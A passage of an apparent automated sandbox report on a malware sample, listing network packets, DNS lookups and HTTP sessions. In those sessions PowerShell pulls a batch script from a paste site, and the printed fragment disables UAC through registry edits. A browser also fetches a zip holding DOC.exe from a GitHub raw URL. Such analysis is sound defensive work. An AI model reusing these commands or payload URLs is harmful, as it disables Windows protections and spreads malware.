                                                                                Dec 30, 2024 11:40:29.229830027 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.230232000 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.230253935 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.230509043 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.230534077 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.231484890 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.231497049 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.231647968 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.231694937 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.231728077 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.231766939 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.231802940 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.232332945 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.236057997 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.236076117 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.236252069 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.236260891 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.236289978 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.236483097 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.236499071 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.236980915 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.237001896 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.237974882 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.237982988 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.239198923 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.239476919 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.313786030 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.313843012 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.314136028 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.314202070 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.314409018 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.314429998 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.314886093 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.314907074 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.315205097 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.315238953 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.320535898 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.321541071 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.325453997 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.325475931 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.325581074 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.325591087 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.325609922 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.325642109 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.325735092 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.325800896 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.325843096 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.325877905 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.325912952 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.325973034 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.326035976 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.326199055 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.331408024 CET49731443192.168.2.4185.199.111.133
                                                                                Dec 30, 2024 11:40:29.331423998 CET44349731185.199.111.133192.168.2.4
                                                                                Dec 30, 2024 11:40:29.660345078 CET49672443192.168.2.4173.222.162.32
                                                                                Dec 30, 2024 11:40:29.660388947 CET44349672173.222.162.32192.168.2.4
                                                                                Dec 30, 2024 11:40:32.208204985 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:32.208250999 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:40:32.208323956 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:32.208561897 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:32.208573103 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:40:32.739352942 CET4972380192.168.2.42.22.50.144
                                                                                Dec 30, 2024 11:40:32.744448900 CET80497232.22.50.144192.168.2.4
                                                                                Dec 30, 2024 11:40:32.746546984 CET4972380192.168.2.42.22.50.144
                                                                                Dec 30, 2024 11:40:32.846055984 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:40:32.864963055 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:32.864999056 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:40:32.866578102 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:40:32.878849030 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:32.904679060 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:32.905077934 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:40:33.061806917 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:33.061830997 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:40:33.162122011 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:42.742814064 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:40:42.742887020 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:40:42.742983103 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:43.379946947 CET49744443192.168.2.4142.250.185.100
                                                                                Dec 30, 2024 11:40:43.379957914 CET44349744142.250.185.100192.168.2.4
                                                                                Dec 30, 2024 11:41:21.456732988 CET4972480192.168.2.4199.232.210.172
                                                                                Dec 30, 2024 11:41:21.462344885 CET8049724199.232.210.172192.168.2.4
                                                                                Dec 30, 2024 11:41:21.462527990 CET4972480192.168.2.4199.232.210.172

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Dec 30, 2024 11:40:17.598069906 CET5129153192.168.2.41.1.1.1
                                                                                Dec 30, 2024 11:40:17.608623028 CET53512911.1.1.1192.168.2.4
                                                                                Dec 30, 2024 11:40:27.640077114 CET5832553192.168.2.41.1.1.1
                                                                                Dec 30, 2024 11:40:27.640203953 CET5054453192.168.2.41.1.1.1
                                                                                Dec 30, 2024 11:40:27.646368980 CET53569511.1.1.1192.168.2.4
                                                                                Dec 30, 2024 11:40:27.646481991 CET53583251.1.1.1192.168.2.4
                                                                                Dec 30, 2024 11:40:27.647157907 CET53505441.1.1.1192.168.2.4
                                                                                Dec 30, 2024 11:40:28.010988951 CET53565981.1.1.1192.168.2.4
                                                                                Dec 30, 2024 11:40:28.963949919 CET53648431.1.1.1192.168.2.4
                                                                                Dec 30, 2024 11:40:32.200329065 CET5262253192.168.2.41.1.1.1
                                                                                Dec 30, 2024 11:40:32.200468063 CET4958553192.168.2.41.1.1.1
                                                                                Dec 30, 2024 11:40:32.207143068 CET53526221.1.1.1192.168.2.4
                                                                                Dec 30, 2024 11:40:32.207218885 CET53495851.1.1.1192.168.2.4
                                                                                Dec 30, 2024 11:40:33.051439047 CET138138192.168.2.4192.168.2.255

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Dec 30, 2024 11:40:17.598069906 CET192.168.2.41.1.1.10xfc22Standard query (0)paste.foA (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:27.640077114 CET192.168.2.41.1.1.10x65feStandard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:27.640203953 CET192.168.2.41.1.1.10x9a27Standard query (0)raw.githubusercontent.com65IN (0x0001)false
                                                                                Dec 30, 2024 11:40:32.200329065 CET192.168.2.41.1.1.10x98ffStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:32.200468063 CET192.168.2.41.1.1.10x595fStandard query (0)www.google.com65IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Dec 30, 2024 11:40:17.608623028 CET1.1.1.1192.168.2.40xfc22No error (0)paste.fo172.67.144.225A (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:17.608623028 CET1.1.1.1192.168.2.40xfc22No error (0)paste.fo104.21.28.76A (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:27.646481991 CET1.1.1.1192.168.2.40x65feNo error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:27.646481991 CET1.1.1.1192.168.2.40x65feNo error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:27.646481991 CET1.1.1.1192.168.2.40x65feNo error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:27.646481991 CET1.1.1.1192.168.2.40x65feNo error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:32.207143068 CET1.1.1.1192.168.2.40x98ffNo error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                                                                Dec 30, 2024 11:40:32.207218885 CET1.1.1.1192.168.2.40x595fNo error (0)www.google.com65IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • paste.fo
                                                                                • raw.githubusercontent.com

                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449730172.67.144.2254437440C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 10:40:18 UTC74OUTGET /raw/a1af5a4d0301 HTTP/1.1
                                                                                Host: paste.fo
                                                                                Connection: Keep-Alive
                                                                                2024-12-30 10:40:18 UTC1047INHTTP/1.1 200 OK
                                                                                Date: Mon, 30 Dec 2024 10:40:18 GMT
                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: PHPSESSID=sr7roqasevrnr4tr03hlujs5fl; path=/
                                                                                Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                Pragma: no-cache
                                                                                Vary: Accept-Encoding
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t%2BjX15ASxKbFcfdRVhyF0jlDnaeilIlvlooV2xdDEF%2BSEKWFji80hMMI28gl7Mz3ewhMKl0f6lmZOMN6EoxoP3saCS4ETewAqZSJkpi1nHSjxChm2uGsyoTMuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8fa169318868159f-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1641&rtt_var=633&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2325&recv_bytes=688&delivery_rate=1706604&cwnd=175&unsent_bytes=0&cid=b4fa84ac0bc125ee&ts=329&x=0"
                                                                                2024-12-30 10:40:18 UTC322INData Raw: 36 38 61 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 73 65 74 6c 6f 63 61 6c 20 45 4e 41 42 4c 45 44 45 4c 41 59 45 44 45 58 50 41 4e 53 49 4f 4e 0d 0a 0d 0a 3a 3a 20 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 0d 0a 73 65 74 20 22 63 6d 64 5f 72 65 67 3d 72 65 67 2e 65 78 65 20 41 44 44 22 0d 0a 73 65 74 20 22 70 6f 6c 69 63 79 5f 70 61 74 68 3d 48 4b 4c 4d 5c 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69 63 69 65 73 5c 53 79 73 74 65 6d 22 0d 0a 73 65 74 20 22 72 65 67 5f 70 61 72 61 6d 73 3d 2f 74 20 52 45 47 5f 44 57 4f 52 44 20 2f 64 20 30 20 2f 66 22 0d 0a 73 65 74 20 22 70 73 5f 63 6d 64 3d 50 6f 77 65 72 53 68 65 6c 6c 20 2d 43
                                                                                Data Ascii: 68a@echo offsetlocal ENABLEDELAYEDEXPANSION:: ????? ??????? ?????? ?????set "cmd_reg=reg.exe ADD"set "policy_path=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"set "reg_params=/t REG_DWORD /d 0 /f"set "ps_cmd=PowerShell -C
                                                                                2024-12-30 10:40:18 UTC1359INData Raw: 45 44 20 73 65 74 20 49 53 5f 4d 49 4e 49 4d 49 5a 45 44 3d 31 20 26 26 20 73 74 61 72 74 20 22 22 20 2f 6d 69 6e 20 22 25 7e 64 70 6e 78 30 22 20 25 2a 20 26 26 20 65 78 69 74 0d 0a 0d 0a 3a 3a 20 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 20 3f 3f 3f 3f 3f 3f 0d 0a 21 63 6d 64 5f 72 65 67 21 20 21 70 6f 6c 69 63 79 5f 70 61 74 68 21 20 2f 76 20 45 6e 61 62 6c 65 4c 55 41 20 21 72 65 67 5f 70 61 72 61 6d 73 21 0d 0a 21 63 6d 64 5f 72 65 67 21 20 21 70 6f 6c 69 63 79 5f 70 61 74 68 21 20 2f 76 20 45 6e 61 62 6c 65 49 6e 73 74 61 6c 6c 65 72 44 65 74 65 63 74 69 6f 6e 20 21 72 65 67 5f 70 61 72 61 6d 73 21 0d 0a 21 63 6d 64 5f 72 65 67 21 20 21 70 6f 6c 69 63
                                                                                Data Ascii: ED set IS_MINIMIZED=1 && start "" /min "%~dpnx0" %* && exit:: ????? ????? ????????? ???????? ????????? ?????? ??????!cmd_reg! !policy_path! /v EnableLUA !reg_params!!cmd_reg! !policy_path! /v EnableInstallerDetection !reg_params!!cmd_reg! !polic
                                                                                2024-12-30 10:40:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.449731185.199.111.1334437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-30 10:40:28 UTC711OUTGET /knkbkk212/knkbkk212/refs/heads/main/DOC.zip HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Upgrade-Insecure-Requests: 1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Sec-Fetch-Site: none
                                                                                Sec-Fetch-Mode: navigate
                                                                                Sec-Fetch-User: ?1
                                                                                Sec-Fetch-Dest: document
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-12-30 10:40:28 UTC893INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 1259880
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: application/zip
                                                                                ETag: "ea8fe7b750610985a05d1f0e28f9fd40a685d7a16e37755a1863e05428e5222c"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: AA1B:F2CE2:191194:1C9E8E:6772788F
                                                                                Accept-Ranges: bytes
                                                                                Date: Mon, 30 Dec 2024 10:40:28 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-nyc-kteb1890020-NYC
                                                                                X-Cache: MISS
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1735555228.221529,VS0,VE114
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: fef646c2874f2082ab57f4aea43a39b9aa73ca0d
                                                                                Expires: Mon, 30 Dec 2024 10:45:28 GMT
                                                                                Source-Age: 0
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 50 4b 03 04 2d 00 09 08 08 00 27 34 7e 59 e5 37 d6 03 ff ff ff ff ff ff ff ff 07 00 14 00 44 4f 43 2e 65 78 65 01 00 10 00 00 64 1a 00 00 00 00 00 b8 38 13 00 00 00 00 00 99 a5 aa 98 1f b6 ad 40 a8 17 47 90 3c fc 75 26 b2 f5 68 ed 56 a5 a8 34 04 e5 2b 08 71 27 3d 44 7c 55 5b 34 42 24 f7 1b f4 89 9f 77 3c 48 0f fb 27 e6 fe 8c 0e 96 8c fc df b7 8d a8 ae cd 6b 44 43 9d 36 cf 78 e2 4c 2d 2e b0 7d 81 5c 1d fa 95 41 ce aa 5b e4 99 98 c6 dd d5 56 fa 50 f5 52 9f 8d ec 69 ae 71 c4 a8 18 13 4a 47 c5 67 0d f2 4a be 28 5d b8 41 ed da cb 50 2d 9b 0a a0 1d 0e 23 88 cb 50 54 3a 25 b5 f9 fc 34 f2 c6 f5 e8 6f 1e 55 de 82 84 90 46 dc 74 91 64 cc 76 96 19 78 62 f4 bf 30 7f e5 bf 69 5a 34 62 b1 7a 0a 4b d0 98 50 0b f4 ad 55 bd fa 65 9a d7 78 a5 85 e4 f9 99 fc 19 26 8d c4 3a
                                                                                Data Ascii: PK-'4~Y7DOC.exed8@G<u&hV4+q'=D|U[4B$w<H'kDC6xL-.}\A[VPRiqJGgJ(]AP-#PT:%4oUFtdvxb0iZ4bzKPUex&:
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 38 89 9a 4a 1a be 2d 4a 68 29 bc 08 00 28 d3 a1 0b 06 86 b6 45 43 22 30 59 99 46 21 91 67 de 78 58 d4 18 c7 30 d9 4f c6 7d b1 4c da a4 96 c6 01 f4 98 3d b1 b3 b4 fd c5 b1 d4 e2 9b 70 e9 e6 cf 11 b5 80 ad e2 9c e2 06 8d 9c 74 2c ca 44 e0 04 dd 3a d2 d0 9f 18 41 df dd f4 ca b5 3d 98 6b 1d a4 1e 11 6f 69 ce 79 16 5c be 55 e3 44 68 11 ef 80 44 b1 07 15 09 53 f1 ab 52 02 da 59 24 d4 65 da 96 42 01 72 70 46 a2 c3 b4 f3 3d cf 15 91 5c 85 d8 35 e6 05 e2 6d 45 74 65 ff 78 7e b5 5d 28 be 63 84 c9 76 cd 05 2a 41 3a de d7 5c b9 35 ce bb 01 a9 46 74 07 c2 a2 7b c8 33 c7 ec db 3b 57 1f 49 04 09 bd 1b de 6d d1 a9 a1 23 12 4c 71 3d e3 47 1b 68 00 3c ef 8f 1e a4 af 1e 15 33 89 9c b5 5d b1 45 66 e1 67 41 44 c4 a2 0f 23 62 bf 98 b5 5e 2d 9f bd 0e 5f a4 a7 52 fe 90 a1 a3 09
                                                                                Data Ascii: 8J-Jh)(EC"0YF!gxX0O}L=pt,D:A=koiy\UDhDSRY$eBrpF=\5mEtex~](cv*A:\5Ft{3;WIm#Lq=Gh<3]EfgAD#b^-_R
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: cf 81 cb a1 ab 6a 05 04 73 ac 8b 3a aa 40 83 ad 4b 5e 41 af eb 9d 63 4b 99 12 a2 55 1c e7 97 b7 cd 31 4c ea 14 54 91 93 19 89 b5 cc ff c8 22 67 98 3a 5d 79 c3 9c 65 93 c1 48 ec 51 c4 3a 68 4d 37 c3 7d 60 4a a3 31 d1 d9 40 11 c7 88 64 87 23 15 53 da fd 1d c6 54 40 10 b2 8e 58 00 5b 5d c9 4b 3c b4 77 b3 6c 71 c1 af c4 f0 0a 3b d3 e2 2f ae 47 f1 25 58 5f 43 35 9e 46 6b 0c 87 25 41 e5 59 8e 75 64 f9 77 ad fb 83 29 85 c5 15 0d eb 87 5c d9 bf 54 6f 4e 27 f6 f4 ff 5d 19 a7 b5 c2 c6 b0 d1 2d ab a3 51 88 89 94 4c f2 e1 36 9c 3a 56 c5 bc e9 87 2a a3 97 6c 54 7c 14 ac 69 50 c0 ae 68 eb 87 cd bf 21 88 d8 62 5a 78 59 5b 9c f6 c7 1e 2f 95 60 76 55 b9 07 fe 91 99 d2 69 44 be 69 df 5e 77 ee aa 4c e2 87 d5 db 45 35 eb 84 4c f3 3e 20 2a dc c6 2d ba 39 7c 1c cd 23 b8 e8 b6
                                                                                Data Ascii: js:@K^AcKU1LT"g:]yeHQ:hM7}`J1@d#ST@X[]K<wlq;/G%X_C5Fk%AYudw)\ToN']-QL6:V*lT|iPh!bZxY[/`vUiDi^wLE5L> *-9|#
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 1d e1 70 84 66 da 56 4d cf 05 21 0b 0c 44 a7 01 6a 99 a8 29 8d cb 20 ec b6 8b ba 71 a5 96 b9 9e 67 39 15 68 2a 35 11 50 13 5a 0e 3b d4 5c b0 5f 95 aa 75 01 d1 31 19 bc 7d 79 7a 2e c6 c8 d2 4c f6 fe 8d e0 87 c0 2c 52 dc f6 fa c6 a9 5b 5f 67 80 14 b1 7d ec ba 96 79 87 ca ec 27 01 f6 34 4c a3 b0 b2 bb 92 68 55 f3 60 c1 f7 39 30 25 74 f7 78 1e 75 e8 af f9 b1 3c 63 3a 34 81 1a 6a 75 65 2a 72 ae 69 84 97 a3 9b 4f d1 a1 b8 d3 0d d2 3e de 8b 45 5c 50 fb 2f 72 ef 98 13 3a f7 f4 27 40 d0 00 00 46 af ed 36 fd 50 8d c8 56 e1 19 58 53 8a f3 9d 7d 89 66 52 7f 1f 08 c9 df 3f 3f 11 49 fd a1 dc e3 65 42 c2 67 9e 0b e1 b2 9e ed a7 a6 30 37 4a 7b dc e0 c0 83 81 07 56 fa 5b 0a 18 c9 75 2b 57 3a cb 06 3b e3 a4 77 02 5a 5b 1b 60 c1 ad 0a 14 51 12 04 8e 3d 48 88 45 74 70 cf 33
                                                                                Data Ascii: pfVM!Dj) qg9h*5PZ;\_u1}yz.L,R[_g}y'4LhU`90%txu<c:4jue*riO>E\P/r:'@F6PVXS}fR??IeBg07J{V[u+W:;wZ[`Q=HEtp3
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 27 c5 c7 25 c2 4d 1f 52 ec d4 47 0e 20 f8 7d 08 87 70 41 73 f7 b0 cf bc 02 b9 97 20 d5 b0 01 3f d0 65 d6 f5 af 1b 7b e3 b4 8f ce 64 2f 6f 34 f0 64 fd f1 cf be fb 40 93 da e4 d8 12 c3 f8 7e e9 ce ea 8b 6a da 47 22 48 08 0b 7a de 1e d9 97 05 a0 52 77 2c 55 40 05 f8 ca 6b f8 5c e7 40 c7 b6 05 8e 68 bd b7 17 3a b3 f8 c0 39 40 a7 f8 48 f6 85 28 a8 d3 0c 32 d4 6f 4c 3c 6c 9a 35 2c a1 0b 85 ee 04 4b 6c b0 00 2c 52 3c b0 ba b0 20 e2 50 f4 21 79 45 ab c9 5c 27 ad 43 7b 65 8a ff 24 39 3d 6e c1 57 01 92 a0 7e ea 35 99 1f 6c fd 6f 8b db 5b f6 61 c1 6e 1f 25 8f 17 5b 0d 66 f4 70 53 9c 64 66 63 e7 37 93 20 e1 a9 53 ab 5a 65 01 87 81 50 f0 4d 01 9a fb 76 f0 5d fc 02 14 49 f9 1e c5 57 d8 a3 eb 1b 8f ea 55 14 b1 77 12 cb 6a eb 72 a3 09 e2 bf bd 15 ac 79 87 48 c0 94 5d 51
                                                                                Data Ascii: '%MRG }pAs ?e{d/o4d@~jG"HzRw,U@k\@h:9@H(2oL<l5,Kl,R< P!yE\'C{e$9=nW~5lo[an%[fpSdfc7 SZePMv]IWUwjryH]Q
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: ea e9 00 2b 7c 05 18 f0 11 a2 52 56 74 e2 cb 8e 6b ac 7c f7 ae 40 28 f2 d4 5d 02 41 5d fa 67 a9 a1 be 48 fb d8 4c 4b e2 01 a3 50 0d 4d 33 4c 14 bc 99 00 37 49 72 1b 64 c1 86 52 c2 96 1b d6 55 6b 1a a5 47 1d a1 23 bc 4c 84 bf 61 a6 c3 50 64 76 1c 5e ba 21 5f 95 23 56 c9 0b 48 7c 73 d6 c9 4c e2 3c 85 3e 26 ca e8 2c 48 58 43 a2 41 f4 f5 a8 8d ac d9 6f 2b 09 df 0d 44 c9 7e 8d b0 7a 97 82 b5 a2 8f 73 62 a9 4d e2 8a bb e8 b6 e3 cc fb e9 74 70 17 83 1b c1 b0 e5 eb d7 7f eb 44 52 05 aa c5 99 a5 a9 7a 59 a3 f1 bc 8d 9f d8 8c c9 7c eb 85 4e f2 b7 0d 8b a1 e2 bf 7a ec d7 7a fc c4 60 1e 94 39 10 01 7c bb 6c e0 89 7d 65 8f 87 a7 f5 63 83 f9 a2 ba b0 e1 6d e9 dd e2 4a 54 fd 09 b3 bd 7d 98 20 29 c5 ad 0a aa 53 b1 82 a5 88 a0 cc d2 6f 61 85 1b 2d 83 7d 29 21 bd 1e 64 75
                                                                                Data Ascii: +|RVtk|@(]A]gHLKPM3L7IrdRUkG#LaPdv^!_#VH|sL<>&,HXCAo+D~zsbMtpDRzY|Nzz`9|l}ecmJT} )Soa-})!du
                                                                                2024-12-30 10:40:28 UTC1378INData Raw: 06 1a 90 60 90 98 50 82 0b 0e 9c 6c af cc fc 8c a5 10 31 58 57 54 72 5e 32 01 82 93 1e a6 8b d9 ee a3 3a b2 db 99 a2 bb de 3b 04 48 72 ac 0a 84 d2 92 55 53 ee 0b e8 6a a8 9c b2 9b 57 f6 99 29 6a 29 a9 97 ec 12 bb b2 41 79 b1 74 03 a2 9a 3d 76 e5 45 c3 42 5a eb 1c 17 48 c5 f5 31 ca bd db a6 41 00 1c e7 a7 01 56 a7 53 50 9e f4 ab 08 3d aa 03 37 59 86 03 9e fe bb 5a d2 9c c9 77 f0 68 07 9f 03 1c ac b5 49 a0 28 ec 7c 7d 9a 4c ca c0 dd 8a bf e7 87 f9 8b c5 ca 20 93 a7 16 e3 9e 07 9c 83 67 eb 81 99 89 a5 17 cf 0d 62 7c dd 05 72 f0 d6 37 bd f7 fb ec ec 72 a2 6f f4 c5 0f 83 52 c7 29 b5 56 67 45 25 b8 61 4d 6c a4 be b8 49 e7 ff a5 04 20 77 22 32 da e4 87 75 0f 76 32 a6 1b cd 06 41 c8 5b 4c 5f 60 fb 30 f7 bb aa ae 8e 51 86 e9 1d cf fb eb 9c b0 5b 9b ab 5e d0 ee 00
                                                                                Data Ascii: `Pl1XWTr^2:;HrUSjW)j)Ayt=vEBZH1AVSP=7YZwhI(|}L gb|r7roR)VgE%aMlI w"2uv2A[L_`0Q[^
